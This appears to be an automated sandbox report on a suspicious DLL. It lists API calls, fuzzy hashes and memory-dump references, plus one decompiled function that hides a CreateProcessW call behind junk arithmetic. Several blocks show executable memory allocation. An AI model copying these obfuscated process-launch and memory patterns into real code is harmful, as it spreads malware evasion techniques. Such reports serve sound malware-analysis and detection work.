                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F201FDB
                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F20202A
                                                                                                                                                                                                                      • Part of subcall function 6F2154B2: _Yarn.LIBCPMT ref: 6F2154D1
                                                                                                                                                                                                                      • Part of subcall function 6F2154B2: _Yarn.LIBCPMT ref: 6F2154F5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                    • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                    • Opcode ID: 2fd5e2020dddf03e1e7ca74319f7ec4fe3c9db80b422aa4455661d4e1faf2030
                                                                                                                                                                                                                    • Instruction ID: eabdfeeb3d8c6e3f36bc85f96a0f0f55706cbbcc0e8cdc136fa6421786f126de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd5e2020dddf03e1e7ca74319f7ec4fe3c9db80b422aa4455661d4e1faf2030
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64119EB1808B889FD320CF68C900747BBE8EF19714F008A5ED499C3B80D7B5A504CBA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B925
                                                                                                                                                                                                                    • GetACP.KERNEL32(00000000,6F22BB81,?,zO"o,6F24D0FC,6F24D0FC,6F224F7A), ref: 6F22B93C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: zO"o
                                                                                                                                                                                                                    • API String ID: 0-616525808
                                                                                                                                                                                                                    • Opcode ID: c371318f7fd24e4fa245c92c64b5369b1176d4e7617c18fa73cbf42cdae95320
                                                                                                                                                                                                                    • Instruction ID: e2e2b93cdaed6e813dfc14c153dc7b60b0fd17d84efaf436ff69b1d5a00cf48a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c371318f7fd24e4fa245c92c64b5369b1176d4e7617c18fa73cbf42cdae95320
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0F0C23090460A8FDB00EB68C44C7A837B1BB0233AF940348EA389A9D0C7B15868CF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6F2019B5
                                                                                                                                                                                                                      • Part of subcall function 6F2151C1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6F2151CD
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F2019DE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                                    • API String ID: 1846318660-2556327735
                                                                                                                                                                                                                    • Opcode ID: f40c0df8d89f8d77ad6d8768245032e3af8a117a9a36c85565a28e09f7c19850
                                                                                                                                                                                                                    • Instruction ID: 86d5126d7a502077b6acf5d1a2fa04c326bc4d6a29ca7dc954f078056927aebe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f40c0df8d89f8d77ad6d8768245032e3af8a117a9a36c85565a28e09f7c19850
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61E086F291031D5BC614DF98DC01845B7DDEE565143108526E64497600E77194908BA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,6F21221B), ref: 6F2172C5
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 6F2172CC
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F217312
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 6F217319
                                                                                                                                                                                                                      • Part of subcall function 6F21715E: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F217308,00000000), ref: 6F217182
                                                                                                                                                                                                                      • Part of subcall function 6F21715E: HeapAlloc.KERNEL32(00000000), ref: 6F217189
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1864747095-0
                                                                                                                                                                                                                    • Opcode ID: bdc15818417d736d76c5a0b2ce998f753944299ba6d677a89222e39dd168c461
                                                                                                                                                                                                                    • Instruction ID: 79054dc17b3b761ecce12578587193e9dbb277d93223c004bf56556e09090f2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdc15818417d736d76c5a0b2ce998f753944299ba6d677a89222e39dd168c461
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F096B3A4CB1657CB2556BCEC0C98B3BA69FC3B617014119F945D6644DF608451CF54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6F206598
                                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6F2065D0
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F206B0C
                                                                                                                                                                                                                    • GetFocus.USER32 ref: 6F206B91
                                                                                                                                                                                                                    • GetUserDefaultLangID.KERNEL32 ref: 6F206BF4
                                                                                                                                                                                                                    • FlushProcessWriteBuffers.KERNEL32 ref: 6F206C23
                                                                                                                                                                                                                    • GetClipboardSequenceNumber.USER32 ref: 6F206C44
                                                                                                                                                                                                                    • GetLargePageMinimum.KERNEL32 ref: 6F206C80
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6F206C90
                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6F206CBD
                                                                                                                                                                                                                    • GetLargePageMinimum.KERNEL32 ref: 6F206DFA
                                                                                                                                                                                                                    • GetClipboardViewer.USER32 ref: 6F206E26
                                                                                                                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 6F206F01
                                                                                                                                                                                                                    • GdiFlush.GDI32 ref: 6F207331
                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 6F2070CF
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: GetCurrentThreadId.KERNEL32 ref: 6F205BD2
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C10
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C82
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: InitNetworkAddressControl.SHELL32 ref: 6F205D50
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: GetOEMCP.KERNEL32(?,?,00000001,xt), ref: 6F205D77
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: GetOpenClipboardWindow.USER32(?,00000001,xt), ref: 6F205D85
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardMenu$CreateCurrentFlushLargeMinimumPageThreadWindow$AddressAllocBuffersCheckControlDefaultDimensionsFocusForegroundInitLangMarkNetworkNumberOpenProcessSequenceUnothrow_t@std@@@UserViewerVirtualWrite__aulldiv__aullrem__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID: *$B
                                                                                                                                                                                                                    • API String ID: 4218567607-2745293630
                                                                                                                                                                                                                    • Opcode ID: 7a9945bca5e3d83f4cae8ce1addf85c6021591e69ae9e6fe183c9f809d50dd9b
                                                                                                                                                                                                                    • Instruction ID: 6d08c595ac619acb4b17649e6c2b0034d38d62ad3781a2680abe239a0cbfd6ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9945bca5e3d83f4cae8ce1addf85c6021591e69ae9e6fe183c9f809d50dd9b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BB27072908B498FC715DF38C49065ABBF6BFCA354F158A1EE489A7251E730E885CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6F2149AF
                                                                                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6F2149C9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2442719207-0
                                                                                                                                                                                                                    • Opcode ID: d80b4ed6a3a43d28e9ff8183652918f817b04a69a00d4e3d1636b3266bd7e6eb
                                                                                                                                                                                                                    • Instruction ID: a1fd73af277b83351d1c5376c3ffb163edd71d83c57e76df09ac6ab6bcd1a85f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d80b4ed6a3a43d28e9ff8183652918f817b04a69a00d4e3d1636b3266bd7e6eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B41D772D0C72DABDB21DF58C800B9E36F5FB46B5EF114215EA186B580D7705A018FD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F202720: GetTickCount64.KERNEL32 ref: 6F20272E
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213248
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213266
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F21327F
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213281
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213288
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F2132A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1927824332-0
                                                                                                                                                                                                                    • Opcode ID: 9c555fd2fa53b1e8b8e36e0cc23dc3ffd4bd087c1cbbb14463398b4f2b543128
                                                                                                                                                                                                                    • Instruction ID: eb4faaa0f0dc899fafea9acf74ab87a8ce424c45c5ad6f6164909e2bba4a5ebc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c555fd2fa53b1e8b8e36e0cc23dc3ffd4bd087c1cbbb14463398b4f2b543128
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3831BD72C18B488AD703FB3CC446219B7E96F973A4F108716D88577151FBA098E6CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                    • Opcode ID: 9da8926d6b3b45f55c01bbb88e22bed569ddd11082776d3aa87634f9017d35e9
                                                                                                                                                                                                                    • Instruction ID: bd777090aa83e5088e42b70f2e253c891e44af6046caf93147a5cc7ee5a80b85
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9da8926d6b3b45f55c01bbb88e22bed569ddd11082776d3aa87634f9017d35e9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8216571D0962EABDB31CE54C850EAF3AF9FB86B9EB114215EA1C5B154D330AD018FD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                                                                                                    			E02FDA342(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, int _a12, intOrPtr _a20, intOrPtr _a28, struct _STARTUPINFOW* _a40, WCHAR* _a44, intOrPtr _a52, intOrPtr _a56, struct _PROCESS_INFORMATION* _a60) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                    				WCHAR* _t48;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a60);
                                                                                                                                                                                                                    				_t48 = __ecx;
                                                                                                                                                                                                                    				_push(_a56);
                                                                                                                                                                                                                    				_push(_a52);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a44);
                                                                                                                                                                                                                    				_push(_a40);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a28);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E02FDC6D8(_t33);
                                                                                                                                                                                                                    				_v20 = 0xe77ed2;
                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                    				_v12 = 0xc32920;
                                                                                                                                                                                                                    				_t42 = 0x46;
                                                                                                                                                                                                                    				_v12 = _v12 / _t42;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0003aaee;
                                                                                                                                                                                                                    				_v8 = 0xe3b22a;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffff15b6;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x00e8652f;
                                                                                                                                                                                                                    				E02FDE554(0xa45f1f5c, 0x9f993dc3, 0x61);
                                                                                                                                                                                                                    				_t40 = CreateProcessW(_t48, _a44, 0, 0, _a12, 0, 0, 0, _a40, _a60); // executed
                                                                                                                                                                                                                    				return _t40;
                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                    0x02fda34a
                                                                                                                                                                                                                    0x02fda34f
                                                                                                                                                                                                                    0x02fda351
                                                                                                                                                                                                                    0x02fda354
                                                                                                                                                                                                                    0x02fda357
                                                                                                                                                                                                                    0x02fda358
                                                                                                                                                                                                                    0x02fda35b
                                                                                                                                                                                                                    0x02fda35e
                                                                                                                                                                                                                    0x02fda35f
                                                                                                                                                                                                                    0x02fda360
                                                                                                                                                                                                                    0x02fda363
                                                                                                                                                                                                                    0x02fda364
                                                                                                                                                                                                                    0x02fda367
                                                                                                                                                                                                                    0x02fda368
                                                                                                                                                                                                                    0x02fda36b
                                                                                                                                                                                                                    0x02fda36e
                                                                                                                                                                                                                    0x02fda372
                                                                                                                                                                                                                    0x02fda373
                                                                                                                                                                                                                    0x02fda378
                                                                                                                                                                                                                    0x02fda381
                                                                                                                                                                                                                    0x02fda384
                                                                                                                                                                                                                    0x02fda390
                                                                                                                                                                                                                    0x02fda39b
                                                                                                                                                                                                                    0x02fda39e
                                                                                                                                                                                                                    0x02fda3a5
                                                                                                                                                                                                                    0x02fda3ac
                                                                                                                                                                                                                    0x02fda3b3
                                                                                                                                                                                                                    0x02fda3c7
                                                                                                                                                                                                                    0x02fda3e1
                                                                                                                                                                                                                    0x02fda3e8

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00E77ED2,00000000,00000000,00000000,?,?), ref: 02FDA3E1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809479774.0000000002FC0000.00000040.00000010.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: /e
                                                                                                                                                                                                                    • API String ID: 963392458-4252541474
                                                                                                                                                                                                                    • Opcode ID: 495cc109e5d6bacb0bf9c9752aa838be4aea0d45c222a50da2587a216de52034
                                                                                                                                                                                                                    • Instruction ID: f1581f8bb3483c1ba74e1c04ae2fcb52378c908bdd047766acdd9fa2288577c2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 495cc109e5d6bacb0bf9c9752aa838be4aea0d45c222a50da2587a216de52034
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8111C32900148BBCF219F95DC09CDF7F7AEFC9710F045149FA1866160D3728A60DB91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: bfb35ceca2ef74695c8c6dc032610da6ad36c8dc36475e216bedd531c73515b3
                                                                                                                                                                                                                    • Instruction ID: 811ce7f56487dbbbb0c24072f93f1566e6d5e605499448cfbf3dfea218c03002
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfb35ceca2ef74695c8c6dc032610da6ad36c8dc36475e216bedd531c73515b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9931E63364470A5BDB109E3CDC84B5637E9BB82B39F140616E915DBAC0E7B5E94ACF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6F2148AE
                                                                                                                                                                                                                      • Part of subcall function 6F214FAF: InitializeSListHead.KERNEL32(6F24C868,6F2148B8,6F2486B0,00000010,6F214849,?,?,?,6F214A71,?,00000001,?,?,00000001,?,6F2486F8), ref: 6F214FB4
                                                                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F214918
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3231365870-0
                                                                                                                                                                                                                    • Opcode ID: f3f5bb3e71cb5d2613e036a6f24cb816608fba922c4b1115487f2bd7a93b4f48
                                                                                                                                                                                                                    • Instruction ID: d30cbdc2889fb838a8899f662abc9b90d4a81f2954f21750a0a6e6cec7bf269c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3f5bb3e71cb5d2613e036a6f24cb816608fba922c4b1115487f2bd7a93b4f48
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC21F27294C31E9BDB10EBB4C80579C33E1BF0336EF20001AC69C6BAC0CBA52504CE99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(?,?,6F215557,6F21559D), ref: 6F216C4A
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,6F2286BF,?,6F22CF3F,00000000,00000000,?,03496498,00000000), ref: 6F227995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EncodeFeaturePointerPresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4030241255-0
                                                                                                                                                                                                                    • Opcode ID: 42025148c70f1c783ace17e996d6cccd113544685e147cb5b0d93fff74709de0
                                                                                                                                                                                                                    • Instruction ID: 4cb42d3bf16b126ab96348f91154b27aea1e4c7a51955bf3ac1acef648448c21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42025148c70f1c783ace17e996d6cccd113544685e147cb5b0d93fff74709de0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0B470288B0FAAEB156F64E80DB9C3BD59B0272AF000019AB1899CD1DFE19464DD62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6F215A8A
                                                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 6F215AAB
                                                                                                                                                                                                                      • Part of subcall function 6F2153B2: __EH_prolog3.LIBCMT ref: 6F2153B9
                                                                                                                                                                                                                      • Part of subcall function 6F2153B2: std::_Lockit::_Lockit.LIBCPMT ref: 6F2153C4
                                                                                                                                                                                                                      • Part of subcall function 6F2153B2: std::locale::_Setgloballocale.LIBCPMT ref: 6F2153DF
                                                                                                                                                                                                                      • Part of subcall function 6F2153B2: _Yarn.LIBCPMT ref: 6F2153F5
                                                                                                                                                                                                                      • Part of subcall function 6F2153B2: std::_Lockit::~_Lockit.LIBCPMT ref: 6F215435
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3152668004-0
                                                                                                                                                                                                                    • Opcode ID: dfc44e3f807ec6153a65b15cc7c3a4046d69e6e989acfd15de70951349dd95aa
                                                                                                                                                                                                                    • Instruction ID: b8f945d11fd35072f1f9c0ab352fed8984336b635d964dd49372013c94f6bdaa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfc44e3f807ec6153a65b15cc7c3a4046d69e6e989acfd15de70951349dd95aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E092F3D5AB394BD324976C4442718A6E16F42714F950249E6009FBC0CFA488004FC9
                                                                                                                                                                                                                    Uniqueness

